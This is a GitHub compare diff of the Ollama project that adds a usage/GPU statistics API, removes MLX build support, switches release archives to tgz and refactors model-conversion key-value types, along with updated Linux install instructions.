Compare commits

..

1 Commits

Author SHA1 Message Date
jmorganca
d132315276 uip
api: expose usage data
2026-01-16 00:24:07 -08:00
141 changed files with 1185 additions and 27923 deletions

View File

@@ -68,7 +68,6 @@ jobs:
name: bundles-darwin
path: |
dist/*.tgz
dist/*.tar.zst
dist/*.zip
dist/*.dmg
@@ -393,13 +392,13 @@ jobs:
done
- run: |
for ARCHIVE in dist/${{ matrix.os }}-${{ matrix.arch }}/*.tar.in; do
tar c -C dist/${{ matrix.os }}-${{ matrix.arch }} -T $ARCHIVE --owner 0 --group 0 | zstd --ultra -22 -T0 >$(basename ${ARCHIVE//.*/}.tar.zst);
tar c -C dist/${{ matrix.os }}-${{ matrix.arch }} -T $ARCHIVE --owner 0 --group 0 | pigz -9vc >$(basename ${ARCHIVE//.*/}.tgz);
done
- uses: actions/upload-artifact@v4
with:
name: bundles-${{ matrix.os }}-${{ matrix.arch }}-${{ matrix.target }}
path: |
*.tar.zst
*.tgz
# Build each Docker variant (OS, arch, and flavor) separately. Using QEMU is unreliable and slower.
docker-build-push:
@@ -532,7 +531,7 @@ jobs:
- name: Upload release artifacts
run: |
pids=()
for payload in dist/*.txt dist/*.zip dist/*.tgz dist/*.tar.zst dist/*.exe dist/*.dmg ; do
for payload in dist/*.txt dist/*.zip dist/*.tgz dist/*.exe dist/*.dmg ; do
echo "Uploading $payload"
gh release upload ${GITHUB_REF_NAME} $payload --clobber &
pids[$!]=$!

View File

@@ -2,22 +2,6 @@ cmake_minimum_required(VERSION 3.21)
project(Ollama C CXX)
# Handle cross-compilation on macOS: when CMAKE_OSX_ARCHITECTURES is set to a
# single architecture different from the host, override CMAKE_SYSTEM_PROCESSOR
# to match. This is necessary because CMAKE_SYSTEM_PROCESSOR defaults to the
# host architecture, but downstream projects (like MLX) use it to detect the
# target architecture.
if(CMAKE_OSX_ARCHITECTURES AND NOT CMAKE_OSX_ARCHITECTURES MATCHES ";")
# Single architecture specified
if(CMAKE_OSX_ARCHITECTURES STREQUAL "x86_64" AND NOT CMAKE_SYSTEM_PROCESSOR STREQUAL "x86_64")
message(STATUS "Cross-compiling for x86_64: overriding CMAKE_SYSTEM_PROCESSOR from ${CMAKE_SYSTEM_PROCESSOR} to x86_64")
set(CMAKE_SYSTEM_PROCESSOR "x86_64")
elseif(CMAKE_OSX_ARCHITECTURES STREQUAL "arm64" AND NOT CMAKE_SYSTEM_PROCESSOR STREQUAL "arm64")
message(STATUS "Cross-compiling for arm64: overriding CMAKE_SYSTEM_PROCESSOR from ${CMAKE_SYSTEM_PROCESSOR} to arm64")
set(CMAKE_SYSTEM_PROCESSOR "arm64")
endif()
endif()
include(CheckLanguage)
include(GNUInstallDirs)
@@ -28,7 +12,7 @@ set(BUILD_SHARED_LIBS ON)
set(CMAKE_CXX_STANDARD 17)
set(CMAKE_CXX_STANDARD_REQUIRED ON)
set(CMAKE_CXX_EXTENSIONS ON) # Recent versions of MLX Requires gnu++17 extensions to compile properly
set(CMAKE_CXX_EXTENSIONS OFF)
set(GGML_BUILD ON)
set(GGML_SHARED ON)
@@ -163,48 +147,14 @@ if(CMAKE_HIP_COMPILER)
endif()
endif()
if(NOT APPLE)
find_package(Vulkan)
if(Vulkan_FOUND)
add_subdirectory(${CMAKE_CURRENT_SOURCE_DIR}/ml/backend/ggml/ggml/src/ggml-vulkan)
install(TARGETS ggml-vulkan
RUNTIME_DEPENDENCIES
PRE_INCLUDE_REGEXES vulkan
PRE_EXCLUDE_REGEXES ".*"
RUNTIME DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT Vulkan
LIBRARY DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT Vulkan
)
endif()
endif()
option(MLX_ENGINE "Enable MLX backend" OFF)
if(MLX_ENGINE)
message(STATUS "Setting up MLX (this takes a while...)")
add_subdirectory(${CMAKE_CURRENT_SOURCE_DIR}/x/ml/backend/mlx)
# Find CUDA toolkit if MLX is built with CUDA support
find_package(CUDAToolkit)
install(TARGETS mlx mlxc
find_package(Vulkan)
if(Vulkan_FOUND)
add_subdirectory(${CMAKE_CURRENT_SOURCE_DIR}/ml/backend/ggml/ggml/src/ggml-vulkan)
install(TARGETS ggml-vulkan
RUNTIME_DEPENDENCIES
DIRECTORIES ${CUDAToolkit_BIN_DIR} ${CUDAToolkit_BIN_DIR}/x64 ${CUDAToolkit_LIBRARY_DIR}
PRE_INCLUDE_REGEXES cublas cublasLt cudart nvrtc cudnn nccl
PRE_INCLUDE_REGEXES vulkan
PRE_EXCLUDE_REGEXES ".*"
RUNTIME DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
LIBRARY DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
FRAMEWORK DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT MLX
RUNTIME DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT Vulkan
LIBRARY DESTINATION ${OLLAMA_INSTALL_DIR} COMPONENT Vulkan
)
# Manually install cudart and cublas since they might not be picked up as direct dependencies
if(CUDAToolkit_FOUND)
file(GLOB CUDART_LIBS
"${CUDAToolkit_LIBRARY_DIR}/libcudart.so*"
"${CUDAToolkit_LIBRARY_DIR}/libcublas.so*")
if(CUDART_LIBS)
install(FILES ${CUDART_LIBS}
DESTINATION ${OLLAMA_INSTALL_DIR}
COMPONENT MLX)
endif()
endif()
endif()
endif()

View File

@@ -41,7 +41,7 @@
"inherits": [ "CUDA" ],
"cacheVariables": {
"CMAKE_CUDA_ARCHITECTURES": "75-virtual;80-virtual;86-virtual;87-virtual;89-virtual;90-virtual;90a-virtual;100-virtual;103-virtual;110-virtual;120-virtual;121-virtual",
"CMAKE_CUDA_FLAGS": "-t 4",
"CMAKE_CUDA_FLAGS": "-t 2",
"OLLAMA_RUNNER_DIR": "cuda_v13"
}
},
@@ -83,28 +83,6 @@
"cacheVariables": {
"OLLAMA_RUNNER_DIR": "vulkan"
}
},
{
"name": "MLX",
"inherits": [ "Default" ],
"cacheVariables": {
"MLX_ENGINE": "ON",
"OLLAMA_RUNNER_DIR": "mlx"
}
},
{
"name": "MLX CUDA 12",
"inherits": [ "MLX", "CUDA 12" ],
"cacheVariables": {
"OLLAMA_RUNNER_DIR": "mlx_cuda_v12"
}
},
{
"name": "MLX CUDA 13",
"inherits": [ "MLX", "CUDA 13" ],
"cacheVariables": {
"OLLAMA_RUNNER_DIR": "mlx_cuda_v13"
}
}
],
"buildPresets": [
@@ -162,21 +140,6 @@
"name": "Vulkan",
"targets": [ "ggml-vulkan" ],
"configurePreset": "Vulkan"
},
{
"name": "MLX",
"targets": [ "mlx", "mlxc" ],
"configurePreset": "MLX"
},
{
"name": "MLX CUDA 12",
"targets": [ "mlx", "mlxc" ],
"configurePreset": "MLX CUDA 12"
},
{
"name": "MLX CUDA 13",
"targets": [ "mlx", "mlxc" ],
"configurePreset": "MLX CUDA 13"
}
]
}

View File

@@ -131,39 +131,7 @@ COPY ml/backend/ggml/ggml ml/backend/ggml/ggml
RUN --mount=type=cache,target=/root/.ccache \
cmake --preset 'Vulkan' \
&& cmake --build --parallel --preset 'Vulkan' \
&& cmake --install build --component Vulkan --strip --parallel 8
FROM base AS mlx
ARG CUDA13VERSION=13.0
RUN dnf install -y cuda-toolkit-${CUDA13VERSION//./-} \
&& dnf install -y openblas-devel lapack-devel \
&& dnf install -y libcudnn9-cuda-13 libcudnn9-devel-cuda-13 \
&& dnf install -y libnccl libnccl-devel
ENV PATH=/usr/local/cuda-13/bin:$PATH
ENV BLAS_INCLUDE_DIRS=/usr/include/openblas
ENV LAPACK_INCLUDE_DIRS=/usr/include/openblas
ENV CGO_LDFLAGS="-L/usr/local/cuda-13/lib64 -L/usr/local/cuda-13/targets/x86_64-linux/lib/stubs"
ARG PARALLEL
WORKDIR /go/src/github.com/ollama/ollama
COPY CMakeLists.txt CMakePresets.json .
COPY ml/backend/ggml/ggml ml/backend/ggml/ggml
COPY x/ml/backend/mlx x/ml/backend/mlx
COPY go.mod go.sum .
RUN curl -fsSL https://golang.org/dl/go$(awk '/^go/ { print $2 }' go.mod).linux-$(case $(uname -m) in x86_64) echo amd64 ;; aarch64) echo arm64 ;; esac).tar.gz | tar xz -C /usr/local
ENV PATH=/usr/local/go/bin:$PATH
RUN go mod download
RUN --mount=type=cache,target=/root/.ccache \
cmake --preset 'MLX CUDA 13' -DBLAS_INCLUDE_DIRS=/usr/include/openblas -DLAPACK_INCLUDE_DIRS=/usr/include/openblas \
&& cmake --build --parallel ${PARALLEL} --preset 'MLX CUDA 13' \
&& cmake --install build --component MLX --strip --parallel ${PARALLEL}
COPY . .
ARG GOFLAGS="'-ldflags=-w -s'"
ENV CGO_ENABLED=1
ARG CGO_CFLAGS
ARG CGO_CXXFLAGS
# TODO wire up the actual MLX engine here instead of building the main binary...
RUN mkdir -p dist/bin
RUN go build -tags mlx -trimpath -buildmode=pie -o dist/bin/imagegen ./x/imagegen/cmd/engine
&& cmake --install build --component Vulkan --strip --parallel 8
FROM base AS build
@@ -185,8 +153,6 @@ FROM --platform=linux/amd64 scratch AS amd64
COPY --from=cuda-12 dist/lib/ollama /lib/ollama/
COPY --from=cuda-13 dist/lib/ollama /lib/ollama/
COPY --from=vulkan dist/lib/ollama /lib/ollama/
COPY --from=mlx /go/src/github.com/ollama/ollama/dist/lib/ollama /lib/ollama/
COPY --from=mlx /go/src/github.com/ollama/ollama/dist/bin/ /bin/
FROM --platform=linux/arm64 scratch AS arm64
# COPY --from=cuda-11 dist/lib/ollama/ /lib/ollama/

View File

@@ -377,6 +377,15 @@ func (c *Client) ListRunning(ctx context.Context) (*ProcessResponse, error) {
return &lr, nil
}
// Usage returns usage statistics and system info.
func (c *Client) Usage(ctx context.Context) (*UsageResponse, error) {
var ur UsageResponse
if err := c.do(ctx, http.MethodGet, "/api/usage", nil, &ur); err != nil {
return nil, err
}
return &ur, nil
}
// Copy copies a model - creating a model with another name from an existing
// model.
func (c *Client) Copy(ctx context.Context, req *CopyRequest) error {

View File

@@ -792,6 +792,33 @@ type ProcessResponse struct {
Models []ProcessModelResponse `json:"models"`
}
// UsageResponse is the response from [Client.Usage].
type UsageResponse struct {
GPUs []GPUUsage `json:"gpus,omitempty"`
}
// GPUUsage contains GPU/device memory usage breakdown.
type GPUUsage struct {
Name string `json:"name"` // Device name (e.g., "Apple M2 Max", "NVIDIA GeForce RTX 4090")
Backend string `json:"backend"` // CUDA, ROCm, Metal, etc.
Total uint64 `json:"total"`
Free uint64 `json:"free"`
Used uint64 `json:"used"` // Memory used by Ollama
Other uint64 `json:"other"` // Memory used by other processes
}
// UsageStats contains usage statistics.
type UsageStats struct {
Requests int64 `json:"requests"`
TokensInput int64 `json:"tokens_input"`
TokensOutput int64 `json:"tokens_output"`
TotalTokens int64 `json:"total_tokens"`
Models map[string]int64 `json:"models,omitempty"`
Sources map[string]int64 `json:"sources,omitempty"`
ToolCalls int64 `json:"tool_calls,omitempty"`
StructuredOutput int64 `json:"structured_output,omitempty"`
}
// ListModelResponse is a single model description in [ListResponse].
type ListModelResponse struct {
Name string `json:"name"`

View File

@@ -1833,6 +1833,7 @@ func NewCLI() *cobra.Command {
PreRunE: checkServerHeartbeat,
RunE: ListRunningHandler,
}
copyCmd := &cobra.Command{
Use: "cp SOURCE DESTINATION",
Short: "Copy a model",

View File

@@ -6,14 +6,11 @@ import (
"errors"
"fmt"
"io/fs"
"iter"
"log/slog"
"maps"
"os"
"slices"
"strings"
ofs "github.com/ollama/ollama/fs"
"github.com/ollama/ollama/fs/ggml"
)
@@ -21,13 +18,8 @@ type ModelParameters struct {
Architectures []string `json:"architectures"`
VocabSize uint32 `json:"vocab_size"`
// TODO is this needed?
ModelType string `json:"model_type"`
TextModel struct {
VocabSize uint32 `json:"vocab_size"`
HiddenSize uint32 `json:"hidden_size"`
ModelType string `json:"model_type"`
VocabSize uint32 `json:"vocab_size"`
} `json:"text_config"`
}
@@ -41,94 +33,8 @@ type AdapterParameters struct {
} `json:"lora_parameters"`
}
type KV map[string]any
func (kv KV) Architecture() string {
return kv.String("general.architecture", "unknown")
}
type valueTypes interface {
uint8 | int8 | uint16 | int16 |
uint32 | int32 | uint64 | int64 |
string | float32 | float64 | bool
}
type arrayValueTypes interface {
[]uint8 | []int8 | []uint16 | []int16 |
[]uint32 | []int32 | []uint64 | []int64 |
[]string | []float32 | []float64 | []bool
}
func keyValue[T valueTypes | arrayValueTypes](kv KV, key string, defaultValue ...T) (T, bool) {
if !strings.HasPrefix(key, "tokenizer.") && !strings.HasPrefix(key, "general.") {
key = kv.Architecture() + "." + key
}
if val, ok := kv[key].(T); ok {
return val, true
}
return defaultValue[0], false
}
func (kv KV) String(key string, defaultValue ...string) string {
val, _ := keyValue(kv, key, append(defaultValue, "")...)
return val
}
func (kv KV) Uint(key string, defaultValue ...uint32) uint32 {
val, _ := keyValue(kv, key, append(defaultValue, 0)...)
return val
}
func (kv KV) Float(key string, defaultValue ...float32) float32 {
val, _ := keyValue(kv, key, append(defaultValue, 0)...)
return val
}
func (kv KV) Bool(key string, defaultValue ...bool) bool {
val, _ := keyValue(kv, key, append(defaultValue, false)...)
return val
}
func (kv KV) Strings(key string, defaultValue ...[]string) []string {
val, _ := keyValue(kv, key, append(defaultValue, []string{""})...)
return val
}
func (kv KV) Ints(key string, defaultValue ...[]int32) []int32 {
val, _ := keyValue(kv, key, append(defaultValue, []int32{0})...)
return val
}
func (kv KV) Uints(key string, defaultValue ...[]uint32) []uint32 {
val, _ := keyValue(kv, key, append(defaultValue, []uint32{0})...)
return val
}
func (kv KV) Floats(key string, defaultValue ...[]float32) []float32 {
val, _ := keyValue(kv, key, append(defaultValue, []float32{0})...)
return val
}
func (kv KV) Bools(key string, defaultValue ...[]bool) []bool {
val, _ := keyValue(kv, key, append(defaultValue, []bool{false})...)
return val
}
func (kv KV) Len() int {
return len(kv)
}
func (kv KV) Keys() iter.Seq[string] {
return maps.Keys(kv)
}
func (kv KV) Value(key string) any {
return kv[key]
}
func (ModelParameters) KV(t *Tokenizer) KV {
kv := KV{
func (ModelParameters) KV(t *Tokenizer) ggml.KV {
kv := ggml.KV{
"general.file_type": uint32(1),
"general.quantization_version": uint32(2),
"tokenizer.ggml.pre": t.Pre,
@@ -157,7 +63,7 @@ func (ModelParameters) KV(t *Tokenizer) KV {
return kv
}
func (p AdapterParameters) KV() KV {
func (p AdapterParameters) KV() ggml.KV {
var alpha float32
if p.LoraParameters.Alpha == 0 {
alpha = float32(p.Alpha)
@@ -165,7 +71,7 @@ func (p AdapterParameters) KV() KV {
alpha = p.LoraParameters.Alpha
}
kv := KV{
kv := ggml.KV{
"adapter.lora.alpha": alpha,
"adapter.type": "lora",
"general.file_type": uint32(1),
@@ -182,14 +88,9 @@ func (ModelParameters) specialTokenTypes() []string {
}
}
type ModelKV interface {
// KV maps parameters to LLM key-values
KV(*Tokenizer) KV
}
type ModelConverter interface {
ModelKV
// KV maps parameters to LLM key-values
KV(*Tokenizer) ggml.KV
// Tensors maps input tensors to LLM tensors. Model specific modifications can be done here.
Tensors([]Tensor) []*ggml.Tensor
// Replacements returns a list of string pairs to replace in tensor names.
@@ -206,7 +107,7 @@ type moreParser interface {
type AdapterConverter interface {
// KV maps parameters to LLM key-values
KV(ofs.Config) KV
KV(ggml.KV) ggml.KV
// Tensors maps input tensors to LLM tensors. Adapter specific modifications can be done here.
Tensors([]Tensor) []*ggml.Tensor
// Replacements returns a list of string pairs to replace in tensor names.
@@ -214,7 +115,7 @@ type AdapterConverter interface {
Replacements() []string
}
func ConvertAdapter(fsys fs.FS, f *os.File, baseKV ofs.Config) error {
func ConvertAdapter(fsys fs.FS, f *os.File, baseKV ggml.KV) error {
bts, err := fs.ReadFile(fsys, "adapter_config.json")
if err != nil {
return err
@@ -225,8 +126,8 @@ func ConvertAdapter(fsys fs.FS, f *os.File, baseKV ofs.Config) error {
return err
}
arch := baseKV.Architecture()
if arch == "" {
arch, ok := baseKV["general.architecture"]
if !ok {
return errors.New("architecture not set for the base model")
}
@@ -252,19 +153,23 @@ func ConvertAdapter(fsys fs.FS, f *os.File, baseKV ofs.Config) error {
return writeFile(f, conv.KV(baseKV), conv.Tensors(ts))
}
func LoadModelMetadata(fsys fs.FS) (ModelKV, *Tokenizer, error) {
// Convert writes an Ollama compatible model to the provided io.WriteSeeker based on configurations
// and files it finds in the input path.
// Supported input model formats include safetensors.
// Supported input tokenizers files include tokenizer.json (preferred) and tokenizer.model.
func ConvertModel(fsys fs.FS, f *os.File) error {
bts, err := fs.ReadFile(fsys, "config.json")
if err != nil {
return nil, nil, err
return err
}
var p ModelParameters
if err := json.Unmarshal(bts, &p); err != nil {
return nil, nil, err
return err
}
if len(p.Architectures) < 1 {
return nil, nil, errors.New("unknown architecture")
return errors.New("unknown architecture")
}
var conv ModelConverter
@@ -312,22 +217,22 @@ func LoadModelMetadata(fsys fs.FS) (ModelKV, *Tokenizer, error) {
case "DeepseekV3ForCausalLM":
conv = &deepseek2Model{}
default:
return nil, nil, fmt.Errorf("unsupported architecture %q", p.Architectures[0])
return fmt.Errorf("unsupported architecture %q", p.Architectures[0])
}
if err := json.Unmarshal(bts, conv); err != nil {
return nil, nil, err
return err
}
if t, ok := conv.(moreParser); ok {
if err := t.parseMore(fsys); err != nil {
return nil, nil, err
return err
}
}
t, err := parseTokenizer(fsys, conv.specialTokenTypes())
if err != nil {
return nil, nil, err
return err
}
vocabSize := int(cmp.Or(p.VocabSize, p.TextModel.VocabSize))
@@ -349,19 +254,6 @@ func LoadModelMetadata(fsys fs.FS) (ModelKV, *Tokenizer, error) {
default:
slog.Debug("vocabulary", "size", len(t.Vocabulary.Tokens))
}
return conv, t, nil
}
// Convert writes an Ollama compatible model to the provided io.WriteSeeker based on configurations
// and files it finds in the input path.
// Supported input model formats include safetensors.
// Supported input tokenizers files include tokenizer.json (preferred) and tokenizer.model.
func ConvertModel(fsys fs.FS, f *os.File) error {
kv, t, err := LoadModelMetadata(fsys)
if err != nil {
return err
}
conv := kv.(ModelConverter)
ts, err := parseTensors(fsys, strings.NewReplacer(conv.Replacements()...))
if err != nil {
@@ -371,7 +263,7 @@ func ConvertModel(fsys fs.FS, f *os.File) error {
return writeFile(f, conv.KV(t), conv.Tensors(ts))
}
func writeFile(f *os.File, kv KV, ts []*ggml.Tensor) error {
func writeFile(f *os.File, kv ggml.KV, ts []*ggml.Tensor) error {
for i := range ts {
ts[i].Shape = slices.Clone(ts[i].Shape)
slices.Reverse(ts[i].Shape)

View File

@@ -88,7 +88,7 @@ func (p *bertModel) parseMore(fsys fs.FS) error {
return nil
}
func (p *bertModel) KV(t *Tokenizer) KV {
func (p *bertModel) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "bert"
kv["bert.attention.causal"] = false

View File

@@ -24,7 +24,7 @@ type commandrModel struct {
var _ ModelConverter = (*commandrModel)(nil)
func (p *commandrModel) KV(t *Tokenizer) KV {
func (p *commandrModel) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "command-r"
kv["general.name"] = "command-r"

View File

@@ -47,7 +47,7 @@ type deepseek2Model struct {
Architecture string
}
func (p *deepseek2Model) KV(t *Tokenizer) KV {
func (p *deepseek2Model) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "deepseek2"
kv["general.type"] = "model"

View File

@@ -41,7 +41,7 @@ type deepseekocr struct {
} `json:"vision_config"`
}
func (m *deepseekocr) KV(t *Tokenizer) KV {
func (m *deepseekocr) KV(t *Tokenizer) ggml.KV {
kv := m.ModelParameters.KV(t)
kv["general.architecture"] = "deepseekocr"
kv["block_count"] = m.LanguageConfig.HiddenLayers

View File

@@ -23,7 +23,7 @@ type gemmaModel struct {
var _ ModelConverter = (*gemmaModel)(nil)
func (p *gemmaModel) KV(t *Tokenizer) KV {
func (p *gemmaModel) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "gemma"
kv["gemma.context_length"] = p.MaxPositionEmbeddings

View File

@@ -1,5 +1,7 @@
package convert
import "github.com/ollama/ollama/fs/ggml"
type gemma2Model struct {
gemmaModel
SlidingWindow uint32 `json:"sliding_window"`
@@ -7,7 +9,7 @@ type gemma2Model struct {
FinalLogitSoftcap float32 `json:"final_logit_softcapping"`
}
func (p *gemma2Model) KV(t *Tokenizer) KV {
func (p *gemma2Model) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "gemma2"
kv["gemma2.context_length"] = p.MaxPositionEmbeddings

View File

@@ -6,7 +6,6 @@ import (
"github.com/pdevine/tensor"
"github.com/pdevine/tensor/native"
"github.com/ollama/ollama/fs"
"github.com/ollama/ollama/fs/ggml"
)
@@ -16,7 +15,7 @@ type gemma2Adapter struct {
var _ AdapterConverter = (*gemma2Adapter)(nil)
func (p *gemma2Adapter) KV(baseKV fs.Config) KV {
func (p *gemma2Adapter) KV(baseKV ggml.KV) ggml.KV {
kv := p.AdapterParameters.KV()
kv["general.architecture"] = "gemma2"
return kv

View File

@@ -3,6 +3,8 @@ package convert
import (
"cmp"
"slices"
"github.com/ollama/ollama/fs/ggml"
)
type gemma3Model struct {
@@ -53,7 +55,7 @@ const (
gemma27BLayerCount = 62
)
func (p *gemma3Model) KV(t *Tokenizer) KV {
func (p *gemma3Model) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "gemma3"

View File

@@ -38,7 +38,7 @@ type gemma3nModel struct {
VisionModel struct{} `json:"vision_config"`
}
func (m *gemma3nModel) KV(t *Tokenizer) KV {
func (m *gemma3nModel) KV(t *Tokenizer) ggml.KV {
kv := m.ModelParameters.KV(t)
kv["general.architecture"] = "gemma3n"
kv["gemma3n.activation_sparsity_scale"] = slices.Collect(func(yield func(float32) bool) {

View File

@@ -37,7 +37,7 @@ type gptossModel struct {
var _ ModelConverter = (*gptossModel)(nil)
func (m *gptossModel) KV(t *Tokenizer) KV {
func (m *gptossModel) KV(t *Tokenizer) ggml.KV {
kv := m.ModelParameters.KV(t)
kv["general.architecture"] = "gptoss"
kv["general.file_type"] = uint32(4)

View File

@@ -48,7 +48,7 @@ type llamaModel struct {
var _ ModelConverter = (*llamaModel)(nil)
func (p *llamaModel) KV(t *Tokenizer) KV {
func (p *llamaModel) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "llama"
kv["llama.vocab_size"] = p.VocabSize

View File

@@ -35,7 +35,7 @@ type llama4Model struct {
}
// KV implements ModelConverter.
func (p *llama4Model) KV(t *Tokenizer) KV {
func (p *llama4Model) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "llama4"

View File

@@ -7,7 +7,6 @@ import (
"github.com/pdevine/tensor"
"github.com/pdevine/tensor/native"
"github.com/ollama/ollama/fs"
"github.com/ollama/ollama/fs/ggml"
)
@@ -19,13 +18,13 @@ type llamaAdapter struct {
var _ AdapterConverter = (*llamaAdapter)(nil)
func (p *llamaAdapter) KV(baseKV fs.Config) KV {
func (p *llamaAdapter) KV(baseKV ggml.KV) ggml.KV {
kv := p.AdapterParameters.KV()
kv["general.architecture"] = "llama"
kv["llama.attention.head_count"] = baseKV.Value("llama.attention.head_count")
kv["llama.attention.head_count_kv"] = baseKV.Value("llama.attention.head_count_kv")
kv["llama.attention.head_count"] = baseKV["llama.attention.head_count"]
kv["llama.attention.head_count_kv"] = baseKV["llama.attention.head_count_kv"]
p.NumAttentionHeads = baseKV.Value("llama.attention.head_count").(uint32)
p.NumAttentionHeads = baseKV["llama.attention.head_count"].(uint32)
return kv
}

View File

@@ -60,7 +60,7 @@ type mistral3Model struct {
ProjectorHiddenAct string `json:"projector_hidden_act"`
}
func (p *mistral3Model) KV(t *Tokenizer) KV {
func (p *mistral3Model) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "mistral3"
kv["mistral3.vocab_size"] = p.TextModel.VocabSize

View File

@@ -39,7 +39,7 @@ type mistral3CausalModel struct {
} `json:"rope_parameters"`
}
func (p *mistral3CausalModel) KV(t *Tokenizer) KV {
func (p *mistral3CausalModel) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "mistral3"
kv["mistral3.vocab_size"] = p.VocabSize

View File

@@ -12,7 +12,7 @@ type mixtralModel struct {
NumExpertsPerToken uint32 `json:"num_experts_per_tok"`
}
func (p *mixtralModel) KV(t *Tokenizer) KV {
func (p *mixtralModel) KV(t *Tokenizer) ggml.KV {
kv := p.llamaModel.KV(t)
if p.NumLocalExperts > 0 {

View File

@@ -34,7 +34,7 @@ type mllamaModel struct {
} `json:"vision_config"`
}
func (m *mllamaModel) KV(t *Tokenizer) KV {
func (m *mllamaModel) KV(t *Tokenizer) ggml.KV {
kv := m.ModelParameters.KV(t)
kv["general.architecture"] = "mllama"

View File

@@ -87,7 +87,7 @@ func (p *nomicbertModel) parseMore(fsys fs.FS) error {
return nil
}
func (p *nomicbertModel) KV(t *Tokenizer) KV {
func (p *nomicbertModel) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
// Determine architecture based on MoE parameters (following qwen3 pattern)

View File

@@ -34,7 +34,7 @@ type olmoModel struct {
var _ ModelConverter = (*olmoModel)(nil)
func (p *olmoModel) KV(t *Tokenizer) KV {
func (p *olmoModel) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "olmo3"
kv["olmo3.block_count"] = p.NumHiddenLayers

View File

@@ -37,7 +37,7 @@ type phi3Model struct {
var _ ModelConverter = (*phi3Model)(nil)
func (p *phi3Model) KV(t *Tokenizer) KV {
func (p *phi3Model) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "phi3"
kv["phi3.context_length"] = p.MaxPositionEmbeddings

View File

@@ -22,7 +22,7 @@ type qwen2Model struct {
var _ ModelConverter = (*qwen2Model)(nil)
func (q *qwen2Model) KV(t *Tokenizer) KV {
func (q *qwen2Model) KV(t *Tokenizer) ggml.KV {
kv := q.ModelParameters.KV(t)
kv["general.architecture"] = "qwen2"
kv["qwen2.block_count"] = q.HiddenLayers

View File

@@ -29,7 +29,7 @@ type qwen25VLModel struct {
var _ ModelConverter = (*qwen25VLModel)(nil)
func (q *qwen25VLModel) KV(t *Tokenizer) KV {
func (q *qwen25VLModel) KV(t *Tokenizer) ggml.KV {
kv := q.ModelParameters.KV(t)
kv["general.architecture"] = "qwen25vl"

View File

@@ -32,7 +32,7 @@ type qwen3Model struct {
}
// KV implements ModelConverter.
func (q *qwen3Model) KV(t *Tokenizer) KV {
func (q *qwen3Model) KV(t *Tokenizer) ggml.KV {
arch := "qwen3"
if q.NumExperts > 0 {
arch += "moe"

View File

@@ -45,7 +45,7 @@ func (m *qwen3VLModel) parseMore(fsys fs.FS) error {
return json.Unmarshal(bts, &m.VisionModel)
}
func (m *qwen3VLModel) KV(t *Tokenizer) KV {
func (m *qwen3VLModel) KV(t *Tokenizer) ggml.KV {
kv := m.qwen3Model.KV(t)
arch := "qwen3vl"

View File

@@ -19,7 +19,6 @@ import (
"testing"
"github.com/google/go-cmp/cmp"
fsc "github.com/ollama/ollama/fs"
"github.com/ollama/ollama/fs/ggml"
)
@@ -29,7 +28,7 @@ type tensorData struct {
Shape []int `json:"shape"`
}
func convertFull(t *testing.T, fsys fs.FS) (*os.File, fsc.Config, ggml.Tensors) {
func convertFull(t *testing.T, fsys fs.FS) (*os.File, ggml.KV, ggml.Tensors) {
t.Helper()
f, err := os.CreateTemp(t.TempDir(), "f16")
@@ -60,10 +59,9 @@ func convertFull(t *testing.T, fsys fs.FS) (*os.File, fsc.Config, ggml.Tensors)
return r, m.KV(), m.Tensors()
}
func generateResultsJSON(t *testing.T, f *os.File, kv fsc.Config, tensors ggml.Tensors) map[string]string {
func generateResultsJSON(t *testing.T, f *os.File, kv ggml.KV, tensors ggml.Tensors) map[string]string {
actual := make(map[string]string)
for k := range kv.Keys() {
v := kv.Value(k)
for k, v := range kv {
if s, ok := v.(json.Marshaler); !ok {
actual[k] = fmt.Sprintf("%v", v)
} else {
@@ -279,7 +277,7 @@ func generateSafetensorTestData(t *testing.T, tempDir string, tensorData map[str
func TestConvertAdapter(t *testing.T) {
type AdapterCase struct {
Name string
BaseKV KV
BaseKV map[string]any
Expected map[string]string
}

View File

@@ -20,8 +20,8 @@ curl -fsSL https://ollama.com/install.sh | sh
Download and extract the package:
```shell
curl -fsSL https://ollama.com/download/ollama-linux-amd64.tar.zst \
| sudo tar x -C /usr
curl -fsSL https://ollama.com/download/ollama-linux-amd64.tgz \
| sudo tar zx -C /usr
```
Start Ollama:
@@ -41,8 +41,8 @@ ollama -v
If you have an AMD GPU, also download and extract the additional ROCm package:
```shell
curl -fsSL https://ollama.com/download/ollama-linux-amd64-rocm.tar.zst \
| sudo tar x -C /usr
curl -fsSL https://ollama.com/download/ollama-linux-amd64-rocm.tgz \
| sudo tar zx -C /usr
```
### ARM64 install
@@ -50,8 +50,8 @@ curl -fsSL https://ollama.com/download/ollama-linux-amd64-rocm.tar.zst \
Download and extract the ARM64-specific package:
```shell
curl -fsSL https://ollama.com/download/ollama-linux-arm64.tar.zst \
| sudo tar x -C /usr
curl -fsSL https://ollama.com/download/ollama-linux-arm64.tgz \
| sudo tar zx -C /usr
```
### Adding Ollama as a startup service (recommended)
@@ -146,8 +146,8 @@ curl -fsSL https://ollama.com/install.sh | sh
Or by re-downloading Ollama:
```shell
